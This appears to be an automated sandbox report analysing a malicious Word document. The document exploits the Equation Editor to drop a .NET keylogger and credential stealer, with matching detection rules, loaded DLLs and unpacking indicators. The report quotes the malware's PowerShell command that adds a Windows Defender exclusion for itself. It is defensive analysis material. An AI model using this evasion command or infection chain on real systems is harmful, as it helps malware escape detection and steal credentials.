                  Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: H363BpKqz0MdVd7[1].exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: millitingacy20306.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, iMjZsLFxfxH3l8nvPC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, iMjZsLFxfxH3l8nvPC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.csSecurity API names: _0020.SetAccessControl
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.csSecurity API names: _0020.AddAccessRule
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.csSecurity API names: _0020.SetAccessControl
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@8/22@28/8
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$25139776.docx.docJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA497.tmpJump to behavior
                  Source: 0225139776.docx.docOLE indicator, Word Document stream: true
                  Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.drOLE document summary: title field not present or empty
                  Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.drOLE document summary: author field not present or empty
                  Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.drOLE document summary: edited time not present or 0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......................bh.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......................sh.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x........................h.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x........................h.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x........................h.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x........................i.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......x.......................yi.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x........................i.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........i.........................s............8.+..... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x........................i.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x........................i.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x........................i.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......i.........................s............8.+.....$.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......................%j.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x...............h.......Jj.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......................ej.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............8.+.....2.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x........................j.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x........................j.........................s....................l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x...............$........j.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....x...............$........j.........................s............8.+.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x...............$........k.........................s............8.+.............................Jump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: 0225139776.docx.docReversingLabs: Detection: 36%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                  Source: 0225139776.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\0225139776.docx.doc
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: 0225139776.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: 0225139776.docx.docInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.cs.Net Code: gdlTCXgjlF System.Reflection.Assembly.Load(byte[])
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.cs.Net Code: gdlTCXgjlF System.Reflection.Assembly.Load(byte[])
                  Source: 10.2.millitingacy20306.exe.990000.0.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0067884F push ebx; ret 9_2_00678853
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00678808 push ebx; ret 9_2_0067884B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00665EDF push cs; retf 9_2_00665EE0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00678282 push ecx; ret 9_2_0067828B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0066C28C pushad ; retn 0066h9_2_0066C28D
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0067448A push ecx; ret 9_2_0067448B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00674492 push ecx; ret 9_2_00674493
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00678292 push ecx; ret 9_2_00678293
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00668F60 push eax; retf 9_2_00668F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0067577E push ecx; ret 9_2_0067577F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00663B32 push FF0067D0h; retf 9_2_00663B89
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00675F0E push edx; ret 9_2_00675F0F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00675F16 push edx; ret 9_2_00675F17
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_006787EA push eax; ret 9_2_006787EB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_006601F4 push eax; retf 9_2_006601F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00675786 push ecx; ret 9_2_00675787
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_002192A9 push esp; retf 10_2_002192AB
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_00219295 push esp; retf 10_2_00219297
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_002192EA push esp; retf 10_2_002192EB
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_002192FD push ebx; retf 10_2_002192FF
